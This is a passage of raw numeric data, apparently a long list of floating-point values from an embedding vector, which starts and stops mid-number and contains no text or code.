0043482743,0.02298808,0.023985079,0.012568055,0.008248034,0.017652607,-0.0036085923,0.017346425,0.024342347,0.00044550322,0.015540171,-0.026798915,-0.012456945,-0.0023770854,0.028686235,0.009519002,0.005496685,0.011450276,0.011945125,0.011423529,0.023081835,-0.010673881,-0.004974454,-0.02088449,-0.026873464,0.0042103482,-0.01687369,-0.00906459,-0.03686997,-0.0029696173,0.013250924,0.008102216,-0.014407142,-0.015049188,-0.01008357,0.012136236,-0.015049043,-0.0330504,-0.021620186,0.0005160882,0.010216964,-0.020812279,-0.011135719,0.016784329,0.003359709,0.016022326,0.017189076,-0.022008402,-0.0065259617,-0.016067775,-0.029253159,0.01803648,0.000077798926,0.009580176,0.004374404,-0.0074728797,-0.015203386,-0.008266622,-0.006474941,-0.019234557,0.010810196,0.014202306,-0.00661475,0.0012138222,-0.0054436023,-0.014872628,-0.010285049,-0.00006294193,-0.045984987,0.0012152664,-0.004527143,0.021657702,-0.008187522,0.023537872,-0.019941391,0.025068246,0.015795166,0.00042990144,0.00030498812,0.0020823127,0.010138046,0.03134956,0.045540854,0.0029772886,-0.013457887,-0.0029783964,-0.00880262,-0.021325706,-0.0036887636,0.008830593,-0.0020621908,-0.01999419,-0.03495885,0.0027376865,-0.026046313,0.0059746155,0.004800125,-0.006838941,0.025406303,-0.015669558,0.018551596,-0.0027553665,-0.0031937878,0.0065801237,-0.017266186,0.012117241,-0.038978115,-0.025187707,0.027250681,-0.026366988,0.026874656,0.022416903,-0.03731333,-0.013346795,-0.01496354,0.010428261,-0.020593198,0.01991917,-0.0042328076,-0.008054004,-0.028179301,0.007887309,-0.020781599,0.021118598,-0.022921523,-0.015444674,0.0041425456,0.007178095,0.005727769,0.027764395,-0.025374176,0.020978559,0.027258543,-0.0020631645,0.021773888,-0.0002719587,0.010378702,-0.00033674398,0.018551288,0.0054755155,-0.0008734459,0.011209929,-0.019748677,-0.0030667298,0.016937962,-0.0035509828,-0.0036190257,0.0072172987,-0.024671333,-0.018980777,-0.0023956806,0.01333279,-0.007099961,0.023574118,0.009216165,-0.0035240902,-0.0057692556,-0.0009344312,0.017471973,0.0047347406,0.008689066,0.0068020495,0.0060392907,-0.028529538,-0.0067830626,0.007917791,-0.014145808,-0.011057995,-0.0058277664,-0.014423745,0.023440959,0.025617747,-0.013634076,-0.016843649,0.014301966,-0.0004883407,0.004327019,0.014360924,0.020830804,-0.00816383,0.013751869,0.016403068,-0.042531785,-0.0075589283,-0.021766273,-0.0029054848,0.029428763,-0.028272253,0.012912616,-0.004517155,-0.010332045,0.011466651,-0.0045893956,0.0052450085,-0.018512178,0.02297482,-0.0035520094,0.0044806655,0.014584462,-0.02818045,0.0095373895,0.016294604,-0.0048874556,-0.0061300066,0.00083764445,-0.018345863,-0.0069634425,0.009134216,0.007836306,0.01174889,-0.0023473888,0.0045993202,0.01801474,0.036449887,-0.0148480665,0.010547979,-0.021988193,-0.012216259,0.0033139081,0.013212756,-0.021695197,-0.012580866,0.004317052,0.020900937,-0.01020689,-0.008350794,-0.017642448,-0.08494871,0.0077403267,-0.022090686,-0.0170021,0.0066853086,0.00330422,0.0049523567,-0.0003878919,0.047217123,-0.014975942,0.021709492,-0.007312391,0.020289043,-0.009835799,-0.013585786,-0.020768374,-0.017922288,-0.012936845,0.017101359,0.018232696,-0.004229798,-0.0016408318,0.012333188,0.014833721,0.053586394,0.0041991607,0.0013392959,-0.013503026,-0.011895756,-0.0013772388,-0.0035347797,0.010037684,-0.019673783,0.006158595,-0.0098584965,0.0028988803,0.008788005,0.018318787,-0.01171582,-0.011808925,0.012381936,-0.00963517,0.00008460313,0.0358775,-0.005355438,-0.017134007,0.025230028,0.010688413,0.0030043486,-0.007319528,0.016005578,-0.0033634314,-0.013725104,0.011485744,-0.015470231,0.028578337,-0.010838466,0.023386177,0.014257356,0.011405212,0.0034820295,-0.01022967,0.03577323,0.026011862,-0.021626303,-0.01875163,-0.009571534,0.032372862,-0.005729781,-0.017263034,-0.009988279,-0.012769841,0.0055136825,-0.019499725,-0.012310095,0.023543097,-0.008388032,0.0077927494,0.0030314936,-0.012506042,-0.01854926,0.026275689,-0.029904654,0.0060676555,-0.023296146,-0.016352922,0.014617025,-0.0015261567,-0.0011591621,-0.012078152,-0.010830462,0.01530441,0.01139827,0.025154268,0.001341358,0.025196789,-0.0076530767,0.00034740803,-0.00608,-0.0014086156,0.023241434,-0.0017489247,-0.0091262115,0.059377987,0.022836516,0.00090743805,0.0033298254,0.0006713627,0.036111064,0.024412483,-0.0080417,-0.0054349476,-0.0008710427,0.011303954,0.0034357915,-0.00015765025,-0.0028784797,0.02720552,0.002318517,0.028062908,-0.00028197284,-0.0090338895,0.014245848,0.003671848,0.020649651,-0.0043043825,0.001536426,0.012940878,-0.013027276,0.0025008146,0.0033812567,0.0044759866,-0.0007510886,-0.010173329,0.004324961,0.0074823643,-0.004979227,-0.04003162,-0.009208351,-0.000283051,-0.022278912,-0.00019979382,0.0028062072,0.0055375397,0.013806097,-0.0070444657,-0.0021538215,-0.0050708926,0.016445614,0.0059519256,0.000119724435,0.0035386777,0.013032151,0.005142648,-0.0013231337,0.0091509465,0.0014216068,-0.016455254,0.014779022,0.012813311,0.0027892622,-0.0138387615,0.004388991,0.009387914,-0.0380341,0.011207513,0.0015003649,-0.004838037,-0.016186083,-0.007798362,0.00027814464,0.010227966,0.00096769043,0.03105031,0.0008459971,-0.019074019,0.025129363,0.014222661,-0.0061330255,0.017870238,0.0028601536,0.028399134,-0.005466317,0.0018387531,0.018016499,-0.0012724223,-0.022957036,-0.0017324226,-0.010580208,-0.007612377,-0.0058563016,-0.0019753068,0.010702206,0.006279779,-0.017144082,0.035579357,-0.0051467414,0.02550389,0.010558413,-0.019955838,-0.0047899997,0.028749902,0.004801855,0.00089588907,-0.022528883,0.021773353,0.0036213316,-0.040391725,-0.0118865855,-0.012708052,-0.0114414655,-0.008236055,0.008426883,0.0068358323,-0.016742904,0.019792851,-0.036755238,-0.00041816494,-0.0017817939,-0.015992554,-0.00054444774,0.0071994835,0.012641431,0.0023425065,-0.0065112477,-0.026332654,0.01342108,0.018461084,-0.0051788436,0.0054715723,0.021331916,-0.00028603015,0.016006626,0.009231541,-0.029182546,-0.0053701936,0.012748606,0.00067889487,-0.026361762,0.01788481,-0.004694946,0.005088294,0.026925249,-0.0096009215,-0.008159373,0.03497258,0.0005806016,-0.0070939395,0.005455376,0.01841,0.0006118062,0.0061222273,0.01383549,-0.0025998524,-0.012291045,-0.01405621,-0.009224739,-0.0064499076,-0.011191157,-0.0097881295,-0.0002274197,-0.0075520333,-0.0076355776,-0.011970849,-0.014503543,-0.02198667,0.007909297,0.011240143,0.036386084,0.011113332,-0.010064828,-0.0013620048,0.0017676564,0.006326315,-0.009331168,0.0031196768,-0.018276107,-0.0022360394,0.016146231,0.020283882,-0.009835967,0.0013519665,-0.0018137499,-0.016744886,0.008405358,0.01613903,-0.000303248,-0.015654957,0.009961023,-0.006405498,-0.022370568,-0.03781038,0.010439952,0.00035396472,0.011397679,0.013467956,-0.012371244,-0.004422468,-0.01795399,-0.008519728,0.092611864,-0.016682118,0.015969042,0.005728362,-0.006517639,-0.0095822085,0.0100414185,0.011368796,0.010621045,-0.010577865,-0.00927965,-0.01321525,0.005247477,-0.009155108,-0.0030045363,-0.0071166824,-0.01862288,0.026187886,0.013224897,-0.0025091898,-0.0047883186,-0.009472391,-0.013928209,0.017423285,0.0025565473,0.017112585,0.008641646,-0.014619167,0.0018403168,0.008381396,0.0010281961,-0.0021992205,0.016511211,0.00908353,-0.0053349547,-0.004256205,0.0138909435,-0.006494822,0.0028281966,0.009217211,-0.01299749,-0.016838344,0.029876793,0.002697126,0.019435415,-0.020063093,-0.010117576,-0.0022135389,0.0042762887,-0.0055029923,0.0030181021,0.0059514404,-0.0044387504,-0.0007504519,0.0075243586,0.019160729,0.0017571669,0.04168337,0.02074894,0.0011414718,-0.0074663227,0.023863627,0.011147023,-0.008338523,-0.0147383325,0.018406788,-0.0021379283,0.00071271346,0.026202308,-0.015778625,-0.0036259005,-0.009039748,0.0038189907,0.012827229,0.004546656,0.00866153,0.015844243,-0.010495334,-0.004020249,-0.014419427,-0.020035656,0.0034716893,0.03463107,0.01743637,-0.018977728,0.00439284,0.019890962,0.0051025227,0.046938445,0.01083306,0.014088233,-0.013300713,0.0032784126,0.014191748,0.011384019,0.017258408,-0.02114263,0.00966323,-0.019434925,0.006693527,0.0037574864,0.0013432854,0.013364994,-0.014339165,0.0061972286,-0.0028714216,0.002825161,-0.02125066,0.01849453,0.053909797,0.010940011,-0.012393517,-0.007982364,-0.0058545936,-0.002385924,-0.00806116,-0.008505698,-0.00808179,-0.01869249,0.010429811,0.01703425,0.0035719895,-0.016511792,-0.047340855,0.004695333,0.127248,0.009153193,0.004424206,0.004791308,-0.0059804185,-2.6140287e-7,-0.13613717,0.007500746,-0.0025500427,-0.0012963454,-0.004025446,-0.016176507,-0.00845148,0.014871902,0.016883794,-0.0098387925,-0.014168011,-0.026414812,0.014674348,-0.014225743,0.0018795166,0.010809173,-0.005401991,0.018280244,-0.029778335,-0.0051068948,0.015271395,-0.005264126,0.0076896427,-0.02627009,-0.010409823,0.015328053,0.0076062977,-0.00924115,-0.021044884,0.007574961,0.029296165,0.0022613888,-0.031882383,-0.020691939,0.020934306,-0.0073600067,-0.02150192,-0.028397538,-0.1540279,0.0036968011,0.0007007498,-0.036568616,0.025995014,-0.009306363,-0.014226175,0.019006656,0.0023550552,-0.011985753,0.0045709615,0.021410218,-0.015037217,0.002457447,-0.006291704,-0.012794702,0.006548417,0.019423524,0.0049503846,-0.00443974,-0.008934977,-0.007571393,-0.04082756,-0.004878033,-0.016643088,0.025123833,0.0064248038,0.03133,-0.0016143975,-0.0005942113,-0.008086963,0.019414859,-0.020420633,0.013003403,-0.017552797,-0.0070465454,-0.0035548108,0.0023056327,-0.003989812,0.008956591,-0.0039009962,-0.00029202676,-0.014172528,-0.01547815,-0.0020057932,-0.00964332,0.00012431998,0.007989195,0.018530898,-0.009495482,0.007017535,-0.010234996,-0.015244317,0.026645223,-0.010562697,-0.013325894,-0.010109678,-0.028402243,-0.0046876613,0.008078436,-0.00022861281,-0.0050700596,-0.012585013,-0.0038483539,0.024771826,-0.016499758,0.0075813145,-0.02597829,0.0050409357,0.01494548,-0.004112035,0.000052421165,0.017967913,-0.020446613,0.019364465,0.015942322,-0.0000265394,-0.0040517896,0.0019412722,-0.02281051,0.037403062,-0.015836406,-0.007980102,-0.029860519,-0.0060609216,-0.0096696345,-0.0028915077,-0.005441277,0.010342971,0.0069100666,0.03198156,-0.0023276797,0.007561424,0.0010866908,0.025676165,0.009396157,0.04110695,-0.0036669842,-0.034301482,0.007346082,-0.0034892687,-0.009711091,-0.00082400057,0.0003658474,-0.007865683,-0.004804828,0.009786035,-0.0073479004,-0.017624218,0.010246317,0.0063349865,-0.0066655,0.03127494,-0.018502379,-0.025127862,-0.015749887,0.008039107,0.01249776,0.0011754449,-0.031414278,-0.03092022,0.012867732,-0.02034576,0.0062908344,0.026208358,-0.015318131,-0.021984449,0.013361129,-0.030654144,0.022400374,-0.016776336,0.003218453,0.0024630416,0.01772172,-0.006294527,-0.016480219,-0.018262826,0.024006011,-0.03163894,-0.0153837325,-0.026129052,0.0039951103,-0.00062269846,0.0017048427,-0.00085786515,0.00070008874,0.017043738,-0.011883629,0.016741158,0.0005325245,0.013966912,0.030730048,-0.014182957,-0.017549012,0.025145387,0.06754011,-0.008499044,-0.017335154,0.011730722,0.0080123,0.010545329,0.019582625,-0.015693236,-0.013305218,-0.0076413415,-0.009042496,-0.0120326,0.0025400736,-0.011374253,-0.025385663,0.0057285326,-0.001153889,0.020855721,-0.005404252,0.019260844,0.00863448,-0.011986448,-0.019317346,0.024400001,0.013643488,-0.0010780053,0.027738752,-0.021840326,-0.008496655,0.018860178,-0.006077026,-0.010125619,0.003543664,-0.0015925197,0.011551559,-0.025505338,-0.015341368,-0.009393068,-0.0035390286,-0.012261658,0.0106746135,0.010552341,0.0107340785,-0.032133244,0.00013192679,-0.011332947,-0.010015869,0.016222091,0.007816442,-0.008792887,-0.0005852385,0.023841808,0.022985367,-0.0057558124,0.021894876,-0.00407382,-0.009592575,-0.0061802357,0.004187311,-0.012798845,0.024967253,-0.005578945,-0.011294205,-0.013871513,-0.000742592,0.0032831668,0.0059315017,-0.0015355559,0.0057276166,0.0034475662,-0.006842959,0.011663821,-0.012496535,0.018741531,0.0010789849,-0.0019123458,-0.028240994,-0.0037969213,-0.020363662,0.018882498,0.011490797,0.026584102,-0.0135583,-0.010662148,-0.0025118433,-0.01608452,-0.0053849737,0.047060654,-0.009338932,0.009077172,-0.0011532566,0.0026178455,0.018591313,-0.0039390987,0.020282216,0.012599614,0.013384194,0.013713119,0.016982004,-0.010851698,0.023689277,0.014314054,-0.011338873,-0.017363079,0.011561534,0.00096039043,-0.0012572019,0.0045704963,0.01673231,-0.0061424673,0.0013307913,-0.009547636,0.004799935,-0.03574536,-0.026634913,0.035575494,-0.0050694095,-0.0025567634,0.036043853,-0.011478543,-0.020774905,-0.01020501,0.00974299,-0.014033548,0.023299823,-0.007058564,0.0014077818,0.008719502,-0.043153957,0.0067869546,-0.014532666,0.012455297,0.02938411,-0.00030641045,-0.013206125,0.005806506,0.025391558,0.015025981,0.013645269,0.016317198,-0.01716335,-0.0143148005,-0.01096984,0.00027962762,-0.024159791,0.010815959,-0.0014977294,-0.0019406718,-0.030984765,0.027353715,-0.015011356,-0.00080928754,-0.0050618444,-0.015329487,0.019950371,0.005443298,-0.011173236,-0.023206726,-0.03067117,-0.018186338,0.007266196,0.01711651,0.0096304575,-0.009384238,-0.035739996,0.01908121,0.016586753,-0.005391831,0.012121133,0.0017240043,0.0064329933,-0.024947831,-0.011261201,0.00031332576,-0.001821036,-0.007626644,0.002188226,0.010063924,-0.01995968,-0.025869686,0.009555728,0.011577933,0.00090889464,-0.0006352114,0.017379226,0.010064526,0.011063862,0.041285012,-0.002212814,-0.012377436,0.004224271,-0.012708321,-0.02522829,-0.008824741,-0.046266146,-0.011238065,0.012386546,-0.031489395,0.0022597415,0.022234978,0.005025705,0.016929017,-0.027278306,-0.0141517855,0.007173376,-0.004080877,-0.016561307,-0.032464918,-0.016715175,-0.021213884,-0.012936685,-0.010849503,-0.017135615,0.018497976,0.0013184004,0.0010452783,-0.005114341,0.028666068,0.0006012124,-0.033533562,0.0013956276,0.005120826,-0.0101954695,-0.007195451,-0.0108178565,-0.019358218,-0.014699229,0.048373155,-0.030893734,-0.007491726,0.013063171,0.020557387,0.016020996,-0.02175842,-0.0016380457,-0.010535754,-0.024469066,-0.009721702,-0.028578173,-0.009497218,0.0061275046,-0.029815739,-0.015850434,0.00077676034,0.003648046,0.015111453,0.009785602,0.02317468,-0.0045240144,0.010152652,0.007950203,-0.0062954295,-0.036896966,-0.000035273413,0.016482336,-0.007551314,0.014161924,0.008717789,-0.030503323,-0.03356298,-0.010301368,-0.016319282,-0.008283833,0.0018212432,-0.0041028634,0.0019203079,0.008996285,0.04390509,0.01797343,-0.00010489433,0.01256517,0.0007981907,-0.013608961,0.0032413937,0.021555725,-0.01038928,0.0052570025,-0.021649465,0.0059371665,0.024152743,0.016679978,-0.016325798,0.021777926,0.012757321,-0.008641404,-0.0051594325,0.02147951,0.034052376,-0.0062938742,-0.023231482,-0.023670832,0.024494939,0.013375989,-0.015021928,-0.033291314,0.0077587487,-0.013540616,-0.00022858527,0.005359526,0.0090700975,0.030724749,0.0016291578,0.005178964,0.028592844,0.007439752,-0.024724383,0.023907976,0.028855417,-0.0042642034,-0.00063113053,-0.010676092,0.012383243,0.023478629,-0.009976235,-0.0005749773,-0.00031827975,-0.019302601,0.031317133,-0.004177676,0.01979617,-0.013226182,-0.0059474288,-0.012399141,-0.0106785055,-0.043085977,-0.00274643,-0.026394077,-0.022558266,-0.02575808,-0.011976671,-0.0065612025,-0.014971494,0.009551768,-0.15932828,0.0056582317,-0.014029525,-0.010624114,-0.018154295,-0.00652274,0.014066792,-0.004505364,0.013157092,-0.010204851,-0.0037690601,0.025265263,0.01163525,0.019958448,0.0038214528,0.012086623,-0.024877073,-0.00045827948,-0.023229254,0.027577538,0.011648987,0.0032726275,0.005367817,0.0016239042,0.017460486,-0.0023485085,-0.0042182594,0.0101547325,-0.0016851565,0.0064068893,0.0012514825,0.022253033,0.0036327345,0.023249157,0.024424687,0.016928826,0.00036270102,0.006110013,-0.013900592,0.030761022,0.002220508,0.010359391,-0.0073578125,-0.005720242,0.009481567,0.006302126,0.007741527,0.030635098,0.017798588,0.008192917,-0.016474035,0.019463973,-0.006775879,-0.006536299,-0.023292646,-0.006126666,-0.0016738314,-0.002739975,0.033472594,0.008017313,0.00008438943,0.012985006,0.014989889,-0.011968032,0.015221153,-0.0008559875,-0.0050711595,0.009028067,-0.021464875,-0.008544859,0.010098527,0.032688193,-0.007110964,0.009627389,-0.027484078,0.0037773484,0.006825701,-0.017324915,-0.0077211447,0.035302438,-0.038856845,0.0065088263,0.014813665,0.017580057,-0.0037100648,-0.004870876,0.004012035,0.0029487535,-0.00021570236,-0.0062870574,0.017517088,-0.012031381,-0.0044597997,-0.007486265,-0.0044188467,-0.0036718773,-0.01203291,0.018914683,-0.007083494,0.0065316106,-0.008478522,-0.010130639,0.0076771234,-0.004489904,-0.124611504,-0.022602089,0.02660256,0.006089595,-0.009836093,-0.023857329,0.014255581,-0.0077440855,0.041746706,0.011494951,-0.012316846,-0.004016023,0.0039721075,0.008343617,0.017617635,-0.00095567026,-0.027199592,0.005868637,0.0073009185,0.0019204839,0.021109737,-0.01526258,0.0029467074,0.02118933,0.0119306715,0.008797269,0.02078663,0.036331166,0.0191114,0.011744779,-0.0074217203,0.005252652,0.0024129332,-0.024733756,-0.059654456,-0.00068783545,-0.0008217378,-0.006107895,0.01112255,0.018434094,-0.0068973936,-0.014848061,0.02137753,0.01823,-0.005276278,-0.025717415,0.003683167,0.027662212,0.008968291,-0.022441572,-0.010412901,0.010748275,-0.0066782283,-0.006449438,-0.014140705,-0.014933118,0.008058718,0.001347088,0.008354883,0.007901901,-0.0005318767,0.0097058,0.0052911285,0.018795993,0.008558523,0.0124980435,-0.00547943,-0.004443711,-0.015276749,0.017042555,0.017389182,0.030837625,0.0031834086,-0.0097698625,0.023913303,-0.0026024776,0.019413352,0.03387603,0.030870795,-0.0039845295,0.019610768,-0.004946434,0.0058190874,0.029378965,-0.030441504,0.011812739,0.011581442,-0.0021940088,-0.0200839,0.004329603,0.025572788,-0.0012139163,0.011457369,0.010257673,0.023317568,-0.0058435365,0.022835078,-0.0030033218,-0.028090695,-0.016540414,-0.009375358,-0.014466628,0.00013676398,0.020099254,-0.012142935,0.01885817,0.024734512,-0.016015869,0.0001219002,0.00051197223,-0.005906235,0.025640024,-0.005519034,0.011575167,0.009760171,-0.008035561,-0.0071972366,-0.008728915,-0.014266585,-0.0016809602,0.013368061,-0.01279834,0.011153139,-0.012765606,-0.004150575,-0.0033648312,-0.008163792,0.023890708,0.011244955,-0.031117672,0.007124547,0.007899536,0.005856044,0.0023818794,-0.008456886,0.009617683,0.0064196177,-0.007288449,0.0036853522,-0.0051733074,0.0078406455,0.005858078,-0.0022129219,-0.017056724,-0.0029567948,0.002088418,-0.00382344,-0.008456668,-0.0044710045,0.0007529036,-0.0027842352,-0.021508912,0.018781554,0.013292546,0.020078024,0.006573826,-0.014809765,0.016356822,-0.00022734859,0.018227147,-0.017299054,0.028408067,0.020795831,-0.0068662427,-0.020055754,0.0005903779,-0.008932368,-0.00658119,-0.0035699347,0.019754227,-0.0043340866,-0.0017396503,0.003039392,-0.047562487,0.008960905,0.0016640729,-0.0070173475,0.027985835,0.00516378,0.009485324,-0.02094126,0.00666512,-0.016978955,-0.010295975,0.012406947,0.015942242,-0.009570569,-0.026056847,0.010103561,-0.0093913935,0.015655737,-0.010648784,-0.012647443,0.0035274434,-0.0028775185,0.005965766,-0.0015351957,-0.002739694,0.01092008,0.008700061,-0.013193582,-0.0015600981,0.0051196804,0.0039199176,0.011993086,-0.005212378,0.0052750614,0.03319694,0.009289476,-0.0044100625,-0.027504409,0.02242754,-0.011996617,-0.007737754,0.015028407,0.012127185,0.011044452,-0.04397602,0.0031626269,0.022392344,-0.014210511,-0.034024507,0.004095649,0.00027304847,-0.010203003,0.03042897,0.0085392315,0.017785273,-0.03614802,-0.017925726,0.021966336,-0.008078012,-0.03282017,-0.009568843,-0.0032519943,-0.0008065629,0.026370425,-0.0027816698,0.008083375,0.013060642,0.027906623,0.013312652,0.028939046,0.014088448,0.02467914,-0.009324703,0.001939093,0.0056200535,0.031674616,0.01905442,0.016158223,-0.0096505815,-0.006549341,-0.00026073202,-0.009902314,0.010766154,0.026116265,-0.006941631,-0.0018799155,0.0039469367,-0.023764484,0.007865713,-0.028819414,-0.012373616,-0.0044081565,-0.000055943216,-0.002299729,-0.03634842,0.008315884,-0.0014754453,0.02269294,0.023682263,0.0038666336,0.015288057,-0.02445373,-0.001677439,0.02367196,0.00440169,0.0022822728,0.010119916,0.00021945046,-0.003815083,-0.0071869018,0.032036666,0.00336508,0.010464824,-0.0072772144,-0.004943492,-0.02127387,-0.011476502,0.012725453,-0.009436023,-0.0004844625,0.0018459924,-0.0033659728,0.016812796,0.0159223,-0.003500944,-0.0021972384,0.023647165,0.021710008,-0.020209854,0.00012745525,-0.017002188,0.010162686,0.011061232,-0.009471843,0.016589794,0.013938112,-0.0010285182,-0.018992031,0.0072263884,-0.012477077,0.01471372,0.0137257455,-0.0042220554,-0.013491429,-0.00777457,-0.048159182,-0.02787393,-0.008302733,0.0048589786,0.034996364,-0.0345625,0.0033196576,0.0049756467,-0.005209227,0.049174864,-0.016586408,-0.008760738,0.0021141784,-0.074488826,0.005006536,0.005330941,0.021331586,-0.003582575,0.01715503,0.017971955,0.0044788383,0.0144874295,0.0044775256,0.009476113,-0.0015258392,0.00021166474,0.0035864182,0.015524742,-0.002644961,-0.0072447434,0.0033644459,0.008917036,0.0005264701,0.0020963263,0.0027281095,-0.00990929,-0.02711254,0.018549677,-0.04258053,-0.0030298994,0.012366006,-0.0010271871,-0.016512826,0.009428537,-0.015839763,-0.036194608,0.008977961,-0.02894442,-0.016147478,0.014543509,-0.010416677,-0.0068105455,-0.015698783,0.023413165,-0.023106078,-0.013540598,-0.018349282,-0.090217285,-0.0076289363,0.017836425,0.024269065,0.031300012,0.008785559,-0.0052333986,-0.010899137,0.014305245,0.02613523,0.0024493265,-0.0065077264,-0.008433094,0.0041474886,0.02468313,-0.013771016,-0.023695173,0.0033441626,-0.012317118,-0.014644986,0.0007944895,-0.0074194544,-0.008397643,0.00077591266,0.020440053,-0.011693371,-0.0007568412,-0.010172025,0.011841849,0.013622697,0.015526024,-0.001537469,0.009785142,-0.002699868,-0.018464224,0.011202394,-0.0022450143,0.033894565,-0.026618646,-0.026892655,-0.01061437,0.010880255,0.007887291,-0.0009856449,-0.031583782,0.00075321196,-0.02729914,-0.00770767,0.0054402812,0.0047300723,0.0064002625,0.014383219,-0.0017494898,0.010141139,-0.0017053797,0.0068637477,0.00093503925,-0.0075750635,0.037912082,0.006103824,-0.011608606,-0.0031669703,0.0026142034,-0.015107112,-0.007558397,0.0043818303,0.0025135193,0.009196288,-0.017767692,0.0142087275,0.013775583,-0.016217915,0.0010242721,-0.012561682,-0.005483203,0.0150711825,0.013441926,0.0022339816,-0.021075131,0.0011937456,0.034024104,-0.00861364,0.018288285,0.0031868424,0.0017760167,-0.0074466025,-0.014164862,-0.012657236,0.025837552,0.034633223,-0.032128084,-0.00076329417,0.027180163,0.0060188794,0.0070205256,-0.00853979,-0.01889051,0.0043339618,0.026620908,0.009138588,0.0031710456,0.005268439,-0.0078110327,-0.015778515,-0.0010883134,-0.007265816,-0.015366724,0.0044521918,-0.0030170146,-0.020299654,-0.010808362,0.017682752,0.011937925,0.024252946,0.008577006,0.012063309,-0.0051006586,0.040643726,-0.0051326836,-0.03578881,-0.0016174638,-0.024308996,-0.018023811,0.03726389,0.008788733,0.012522687,0.014852751,-0.0047511403,-0.011858865,0.018641546,-0.011542726,0.0131139755,0.00955214,0.0155602135,-0.021564651,0.006052901,-0.021123126,0.012609992,-0.0044362154,0.02219617,0.0031117348,-0.012584249,0.0075735357,-0.013946229,-0.019593053,0.020390423,-0.012168161,0.0032704375,-0.0071586957,-0.01886572,-0.003916769,0.004787103,-0.007844885,-0.003201983,0.01942786,-0.0019224951,0.002141993,-0.0017591472,-0.026981596,0.00024147013,0.0000070445126,0.019132517,0.014258069,-0.009382917,-0.009894133,0.00946148,0.003906884,0.0014462022,0.006001462,-0.012868482,-0.024871087,-0.025794385,0.009584196,-0.009825789,-0.025184203,-0.015576752,0.011105477,0.0033667814,0.005263969,0.00338234,-0.02182843,-0.0040045446,-0.006386253,-0.0062312675,-0.016973127,-0.010403706,0.006577742,-0.0014609115,0.010729553,-0.005206545,-0.005501839,0.009923581,-0.005885145,-0.016955204,-0.009673827,-0.0017954659,0.00032635356,-0.00121124,-0.010429822,0.018121114,-0.00048694568,0.0007266403,-0.015390743,0.015766721,0.026912473,0.0056458283,-0.011055286,0.017983692,-0.011164955,-0.015997859,-0.013244616,0.017994763,0.016928721,0.112140685,0.006568048,-0.0017008735,-0.005235531,0.0021941862,0.0074560256,0.0114737805,-0.013067818,0.010066563,-0.0059891692,0.022369083,-0.009294021,0.016999153,-0.0076411595,-0.000036055666,0.02242578,0.02430068,-0.015996216,0.01322168,0.009240679,0.0097699575,-0.015131859,-0.0010367378,-0.06411037,-0.017138876,-0.06434439,0.026858043,0.016721193,0.0052340752,0.03237091,0.0049885768,0.0022678056,0.00050377304,-0.000289136,-0.013392372,0.018385183,0.016994318,-0.0026557087,-0.0014382885,-0.018624887,0.014822185,0.009187778,-0.0018729233,-0.013107207,-0.0016356172,-0.02399566,0.004754563,-0.012391591,-0.009020302,-0.010634842,-0.010159841,-0.010779418,0.006103082,-0.015845763,0.020751435,-0.00903941,0.0065305047,0.034419708,0.007933846,-0.016509267,0.003759418,0.003418012,0.00876721,0.0038838622,0.017712902,0.022271609,-0.014211479,-0.0138351675,-0.006688942,-0.007236488,0.030160809,-0.003245846,-0.0029203936,0.003062333,-0.007230717,0.027612804,-0.007817009,0.0025122052,0.019367518,-0.021887124,0.0015449879,-0.004709088,0.003467935,-0.018289287,0.0154847065,0.009333273,-0.020126842,0.023014178,-0.003989421,-0.029211303,-0.024014177,0.0184191,0.023497889,-0.0064569646,0.0056891446,0.0011952908,0.009063854,-0.006886046,-0.017181091,-0.0046136584,-0.033111587,-0.015388575,0.007783505,0.009976357,0.007601949,0.0052844957,-0.012831823,-0.0061931955,-0.020636527,-0.0073855426,-0.0038017174,0.035169367,-0.024318112,0.019376757,-0.008514282,0.033826087,-0.03111393,0.0009521406,0.0069099516,-0.027207471,0.00735941,-0.011977834,0.009789829,0.02167769,0.012423128,0.0018465476,-0.01115594,-0.0067315055,-0.0057334662,0.0039763018,0.010484321,-0.027688745,0.005656655,0.01460182,-0.0046091406,-0.003508633,0.035797775,-0.0006873972,0.03334897,0.004030942,-0.0116217965,-0.008791562,0.00028943366,-0.011825427,0.009948496,-0.014324743,0.020328198,-0.0051571084,-0.0058138706,-0.0029630163,-0.0022900016,0.0038075785,-0.01583559,-0.00596634,-0.021950394,-0.016955476,-0.008066296,0.018059084,0.00006241388,-0.0071851145,0.009778488,-0.00036818374,0.0003765164,-0.05281918,0.03122983,0.014697304,0.011412123,0.009151053,0.0051240437,-0.012195195,-0.013743566,-0.0014249637,-0.008329902,0.011302583,-0.021823848,-0.0012523613,0.011071087,0.016115623,-0.030377034,-0.0022410715,0.0041450723,0.036891118,-0.011506205,-0.013733003,0.040179554,0.019439062,-0.0061777015,0.010557931,-0.0145517355,0.014330324,-0.0037264351,-0.01005253,-0.00045110864,0.009689862,-0.032177117,0.0064851255,-0.028763399,0.03806796,-0.02500186,-0.029740011,0.0015528771,-0.0045593358,0.009850914,-0.03445658,-0.008432714,-0.016292145,0.0015318566,-0.0065479917,0.0028655867,-0.008094112,0.000048486163,-0.0006273594,-0.0021877757,-0.039223026,0.0099132955,-0.0028280918,-0.0039900835,-0.022985358,-0.012545912,-0.016319709,0.002918807,0.036218278,0.0051981835,0.005782144,0.0039318297,0.004703415,-0.011821392,0.005893818,0.017111437,-0.025603728,-0.023326708,0.02981246,0.017763354,-0.0036205323,-0.014415792,0.024799954,0.02061281,0.029028188,-0.0007089543,0.0010693575,-0.022302067,0.005985551,0.028287213,0.011346694,-0.035523932,-0.0038514233,-0.013731968,-0.018548904,0.017206792,-0.013456716,-0.04189452,-0.011609498,0.0021423635,-0.017800683,-0.028964436,-0.01195908,0.006985499,0.0196773,0.013288188,-0.010218258,0.005942466,0.0052655283,-0.02183603,0.028421199,-0.00292889,-0.008663821,-0.010691551,0.003556661,-0.010186115,-0.0060519073,-0.0047906297,-0.0012421473,-0.022953043,0.02496556,0.02038491,-0.0056503755,0.00195832,-0.008457712,0.0066680377,-0.018033382,0.01118091,-0.013016382,-0.030201985,-0.017155053,-0.0036118461,0.011452833,-0.0017578729,0.040869307,0.07105412,-0.07473339,-0.011440209,0.022100316,0.016842112,-0.029558541,0.008822155,0.00080974447,-0.021986092,-0.011395092,0.028396416,0.0066322703,-0.00074783113,-0.05917494,-0.009599852,0.01518685,-0.008531241,-0.00996651,0.023284154,-0.01476215,-0.014294516,0.0068751476,-0.0071597574,0.0005024153,-0.007708599,-0.00601356,-0.012844544,-0.012198039,0.010070366,0.009224057,0.0016882231,0.012758412,0.028914321,-0.0148334615,0.005501563,0.015560479,-0.00962949,0.020147156,-0.004210955,-0.026393339,-0.039509367,-0.025878053,-0.0030465492,-0.0034